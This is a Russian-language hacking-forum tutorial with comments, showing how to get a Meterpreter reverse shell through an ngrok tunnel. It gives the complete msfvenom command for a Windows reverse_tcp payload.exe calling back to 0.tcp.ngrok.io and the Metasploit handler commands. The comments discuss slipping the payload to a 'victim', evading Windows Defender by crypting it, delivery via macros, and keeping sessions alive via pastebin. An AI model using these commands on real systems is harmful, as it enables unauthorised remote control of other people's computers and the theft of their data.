Статья [Metasploit] устанавливаем обратное TCP соединение через ngrok

n3d.b0y

n3d.b0y

Red Team
19.01.2018
163
378
26924

Привет codeby.net!

Сегодня я вам покажу как можно получить обратное подключение без прокидывание портов и лишнего геморроя.
Для реализации обратного подключения нам понадобиться metasploit и ngrok.

Metasploit - проект, посвящённый информационной безопасности. Создан для предоставления информации об уязвимостях, помощи в создании сигнатур для IDS, создания и тестирования эксплойтов.
Ngrok - это платформа, которая с помощью установленной утилиты, позволяет, организовать удалённый доступ на веб-сервер или какой-то другой сервис.

Для начало нам надо зарегистрировать аккаунт ngrok. Переходим на сайт , регистрируем аккаунт и выполняем первых три пункта.

24814
Подготовка выполнена, переходим к реализации задуманного.

Шаг 1 - Запускаем Ngrok
Запускаем ngrok: ./ngrok tcp 4444

24815
После запуска ngrok, вы увидете что то похожое на tcp://0.tcp.ngrok.io:13286 -> localhost:4444
Это означает что весь трафик который будет идти на 0.tcp.ngrok.io через порт 13286 будет перенаправляться к нам в машину на порт 4444. Не закрываем терминал и переходим к следующему шагу.

Шаг 2 - Создаем пользовательскую нагрузку
Запустим другой терминал и создадим пользовательскую нагрузку с вышеупомянутым хостом и портом.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13286 -f exe > payload.exe

24816
В данном примере создается пользовательская нагрузка windows, но вам никто не запрещает создать payloads под любую другую ОС используя тот же LHOST и LPORT.

Шаг 3 - Запускаем metasploit listener
Когда все настроено нам остается запустить слушатель. Сделать это можно выполнив приведенные команды ниже.
Код:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
24817
После того как вы выполняете команду “exploit”, metasploit запустить слушатель на порт 4444 на вашей машине, который будет следить за любым входящим обратным TCP соединением.
На этом настройка закончена. После того когда на windows машине запуститься сгенерированная нами пользовательская нагрузка “payload.exe” в консоли мы увидим обратное подключение.

24818
Доступ к атакуемой машине получен а значит мы добились поставленной задачи ;) На этом пожалуй все, надеюсь данный материал был полезен :)
 
Последнее редактирование:
Debug

Debug

Red Team
07.07.2017
174
418
Да, статья все равно очень полезная)
 
id2746

id2746

Grey Team
12.11.2016
383
619
Проверил на себе нагрузки:
android/meterpreter/reverse_tcp
android/meterpreter/reverse_http
Снимок экрана от 2019-01-10 14-10-26.png

всё работает как часы.
 
  • Нравится
Реакции: LTD и n3d.b0y
sicario

sicario

Member
20.04.2018
13
6
только мало толку,одноразовая сессия
 
Pablo Garcia

Pablo Garcia

Member
14.04.2018
20
8
После того когда на windows машине запуститься сгенерированная нами пользовательская нагрузка “payload.exe” в консоли мы увидим обратное подключение.
подскажите совсем зеленому, как запустить этот пейлоад на тарегт хосте?? это происходит автоматически или же "payload.exe" нужно подсунуть "жертве" что бы она сама запустила его на своем ПК?
 
M

.Method

Премиум 72
17.12.2018
59
29
подскажите совсем зеленому, как запустить этот пейлоад на тарегт хосте?? это происходит автоматически или же "payload.exe" нужно подсунуть "жертве" что бы она сама запустила его на своем ПК?
Подсунуть.

Разумеется с согласия жертвы в рамках теста)
 
  • Нравится
Реакции: LTD и Pablo Garcia
n3d.b0y

n3d.b0y

Red Team
19.01.2018
163
378
только мало толку,одноразовая сессия
В корне с этим не согласен. Все зависит от того как это реализовать. Вот один пример из большого количество который можно привести. Если делать payload с восстановление сессии то можно залить порт на pastebin и перед подключением проверять его там. Когда порт измениться меняешь порт на pastebin и все сново работает.

p.s Все ограничивается вашей фантазией ;) Не нужна воспринимать все шаги как строгую инструкцию. Суть статьи показать как можно открыть порт)
 
Последнее редактирование:
  • Нравится
Реакции: MrBa
Pablo Garcia

Pablo Garcia

Member
14.04.2018
20
8
попробовал. сталкнулся с очевидной проблемой( палевностью пейлоада). Через почту или файл обменник не дает отправить/залить. скинул нагрузку на флешку и руками закинул на таргет хост( вин10 бе ав) стандартные системы защиты винды сразу за визжали и определил нагрузку как троян. Залес в карантин выбрал нагрузку и разрешил ее активацию, сессия на мгновение запустилась и тут же упала. От сюда вопросы: как криптануть нагрузку и возможно ли доставка по средствам макросов или подобных методов?
 
P

parsif4l

New member
27.12.2018
4
0
у меня выдает ошибку при создании payload'а. Именно такого. Другие создаются спокойно
 
gashik4

gashik4

New member
16.12.2018
1
0
у меня не приходит сессия через ngrok
 
luzercod

luzercod

Active member
14.02.2019
25
1
ngrok у нас запрещен РФ
 
DarkDepth

DarkDepth

Премиум 72
17.02.2019
58
17
Откуда такая информация?
Читайте другие темы.) Во вчерашней теме вроде было сказано. (Про seeker)

Это же уже старый спсоб, у некоторых робит, у некоторых нет.) Год назад видел чисто такую же... Тему, только скрины были другие.)
 
luzercod

luzercod

Active member
14.02.2019
25
1
ngrok роскомнадзор в сфере интернета все теперь нету программ наподобие ngrok
 
B

Black_orchid

Member
30.10.2018
8
1
ngrok роскомнадзор в сфере интернета все теперь нету программ наподобие ngrok
Странно, гуглил все что можно, также искал на сайте ркн. В итоге не нашел абсолютно ничего связанного с блокировкой ngrok в РФ. Можете поделиться ссылкой на статью, новость или документ связанный с блокировкой?
 
narcoloki

narcoloki

Member
05.03.2019
17
0
2 дня назад цеплялся через ngrok всё работает
 
narcoloki

narcoloki

Member
05.03.2019
17
0
Извиняюсь. Сегодня затестил ngrok- не цыпляется. borrow.io и serve.net вообще на сайт не заходит даже..... :(
 
Мы в соцсетях: